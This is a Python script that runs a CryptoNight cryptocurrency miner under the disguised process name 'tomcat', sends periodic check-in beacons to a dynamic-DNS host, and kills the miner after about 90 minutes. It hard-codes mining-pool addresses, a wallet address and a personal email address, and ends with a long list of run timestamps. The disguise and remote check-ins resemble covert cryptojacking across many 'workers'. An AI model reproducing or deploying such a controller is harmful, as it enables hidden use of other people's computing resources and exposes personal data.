import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:38:01.973172
#2018-02-17 17:26:04.461758
#2018-02-17 19:14:07.229833
#2018-02-17 21:04:04.448828
#2018-02-17 22:49:03.070781
#2018-02-18 00:34:04.056397
#2018-02-18 02:24:01.568342
#2018-02-18 04:11:06.548833
#2018-02-18 06:02:07.901351
#2018-02-18 07:53:03.732573
#2018-02-18 09:40:08.503285
#2018-02-18 11:27:04.148567
#2018-02-18 13:13:06.274723
#2018-02-18 15:02:01.624882
#2018-02-18 16:50:07.325215
#2018-02-18 18:38:04.710592
#2018-02-18 20:26:04.724636
#2018-02-18 22:12:04.840967
#2018-02-18 23:59:07.618748
#2018-02-19 01:46:05.941197
#2018-02-19 03:34:01.365563
#2018-02-19 05:19:06.581833
#2018-02-19 07:06:05.440246
#2018-02-19 08:55:09.467939
#2018-02-19 10:44:04.720102
#2018-02-19 12:33:05.068183
#2018-02-19 14:19:07.869753
#2018-02-19 16:07:08.206953
#2018-02-19 17:55:07.943181
#2018-02-19 19:41:04.202014
#2018-02-19 21:28:05.820657
#2018-02-19 23:13:07.609864
#2018-02-20 00:58:05.806711
#2018-02-20 02:47:06.372760
#2018-02-20 04:35:07.366086
#2018-02-20 06:19:05.393965
#2018-02-20 08:04:01.509597
#2018-02-20 09:49:07.850067
#2018-02-20 11:33:06.516793
#2018-02-20 13:19:07.245408
#2018-02-20 15:05:11.317730
#2018-02-20 16:49:01.377110
#2018-02-20 18:37:04.662753
#2018-02-20 20:27:04.896830
#2018-02-20 22:13:06.732747
#2018-02-20 23:54:03.842583
#2018-02-21 01:40:09.620563
#2018-02-21 03:29:06.831583
#2018-02-21 05:17:04.055945
#2018-02-21 07:05:08.212388
#2018-02-21 08:51:01.818168
#2018-02-21 10:38:01.604609
#2018-02-21 12:25:08.123357
#2018-02-21 14:11:07.335940
#2018-02-21 15:59:01.926975
#2018-02-21 17:51:01.947935
#2018-02-21 19:36:09.266375
#2018-02-21 21:25:04.767608
#2018-02-21 23:11:07.224602
#2018-02-22 01:02:03.782526
#2018-02-22 02:49:06.916039
#2018-02-22 04:36:04.954868
#2018-02-22 06:21:04.092803
#2018-02-22 08:08:04.765729
#2018-02-22 09:56:05.891206
#2018-02-22 11:41:03.854352
#2018-02-22 13:27:09.361494
#2018-02-22 15:16:04.517199
#2018-02-22 17:01:04.206457
#2018-02-22 18:49:06.658218
#2018-02-22 20:42:05.852188
#2018-02-22 22:28:05.390854
#2018-02-23 00:13:05.818779
#2018-02-23 02:01:04.497119
#2018-02-23 03:49:01.789744
#2018-02-23 05:37:06.081444
#2018-02-23 07:22:05.348712
#2018-02-23 09:27:01.423859
#2018-02-23 11:34:06.129613
#2018-02-23 13:25:08.537476
#2018-02-23 15:10:11.441047
#2018-02-23 17:00:11.576205
#2018-02-23 18:47:08.290610
#2018-02-23 20:33:01.539007
#2018-02-23 22:20:07.294867
#2018-02-24 00:05:08.973697
#2018-02-24 01:54:07.398110
#2018-02-24 03:47:05.699250
#2018-02-24 05:36:02.052769
#2018-02-24 07:22:03.605724
#2018-02-24 09:12:03.749830
#2018-02-24 11:12:07.337806
#2018-02-24 13:01:01.681665
#2018-02-24 14:48:05.632691
#2018-02-24 16:40:08.683878
#2018-02-24 18:28:06.783416
#2018-02-24 20:14:07.245221
#2018-02-24 22:04:07.195975
#2018-02-25 02:33:08.531802
#2018-02-25 06:14:05.135884
#2018-02-25 11:40:07.024741